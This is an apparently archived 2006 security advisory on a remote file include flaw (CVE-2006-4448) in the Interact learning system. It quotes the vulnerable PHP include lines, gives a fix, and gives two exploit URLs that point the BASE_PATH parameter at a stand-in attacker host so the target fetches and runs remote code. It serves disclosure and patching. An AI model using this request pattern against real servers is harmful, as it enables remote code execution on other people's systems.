interact <= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability

2006.08.31
Credit: CarcaBotx
Risk: High
Local: No
Remote: Yes
CVE: CVE-2006-4448
CWE: CWE-Other


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

/* +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - - - [Romanian Electronic Network Security Lab Team ThE Best Romanian Hacking Team] - - + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Cce-interact <= 2.2.0 (CONFIG[BASE_PATH]) Remote File Include Vulnerability + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - [Script name: Interact - Online Learning and Collaboration System v. 2.2.0 - [Script site: https://sourceforge.net/projects/cce-interact/ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Find by: CarcaBot + - Contact: CarcaBotx (at) yahoo (dot) com [email concealed] - or - http://Hacking.CarcaBot.ro + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Special Greetz: CarcaBot - http://Hacking.CarcaBot.ro - + */ /* vulnerable code => admin/autoprompter.php line 33-38: .... require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc. php'); require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php'); $rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key, {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey, {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey, {$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt, {$CONFIG['DB_PREFIX']}posts.subject, {$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key, {$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThread Management.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name, {$CONFIG['DB_PREFIX']}posts.added_by_key FROM {$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CON FIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON {$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX' ]}postsAutoPrompts.post_key WHERE {$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX' ]}posts.post_key AND {$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpace Links.ModuleKey AND {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Sp aces.SpaceKey AND {$CONFIG['DB_PREFIX']}posts.date_added<DATE_SUB(CURRENT_DATE,INTERVAL {$CONFIG['DB_PREFIX']}ForumThreadManagement.DaysToWait DAY) AND {$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key IS NULL ORDER BY {$CONFIG['DB_PREFIX']}posts.post_key"); .... Fix Exploit: admin/autoprompter.php line 33-38: .... require_once('../local/config.inc.php'); require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc. php'); require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php'); $rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key, {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey, {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey, {$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt, {$CONFIG['DB_PREFIX']}posts.subject, {$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key, {$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThread Management.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name, {$CONFIG['DB_PREFIX']}posts.added_by_key FROM {$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CON FIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON {$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX' ]}postsAutoPrompts.post_key WHERE {$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX' ]}posts.post_key AND {$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpace Links.ModuleKey AND {$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Sp aces.SpaceKey AND {$CONFIG['DB_PREFIX']}posts.date_added<DATE_SUB(CURRENT_DATE,INTERVAL {$CONFIG['DB_PREFIX']}ForumThreadManagement.DaysToWait DAY) AND {$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key IS NULL ORDER BY {$CONFIG['DB_PREFIX']}posts.post_key"); .... vulnerable code => includes/common.inc.php line 35-40: .... $CONFIG['ADODB_PATH'] = $CONFIG['BASE_PATH'].'/includes/adodb'; //Include database abstraction classes require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php'); require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php'); .... Exploit Fix: includes/common.inc.php line 35-40: .... require_once('../local/config.inc.php'); $CONFIG['ADODB_PATH'] = $CONFIG['BASE_PATH'].'/includes/adodb'; //Include database abstraction classes require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php'); require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php'); */ #Exploit: http://www.site.com/[Cce-interact_path]/admin/autoprompter.php?CONFIG[BA SE_PATH]=[http://www.myevilsite.com/evil_scripts.txt] http://www.site.com/[Cce-interact_path]/includes/common.inc.php?CONFIG[B ASE_PATH]=[http://www.myevilsite.com/evil_scripts.txt] ### End of File ### ### http://Hacking.CarcaBot.ro ###


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top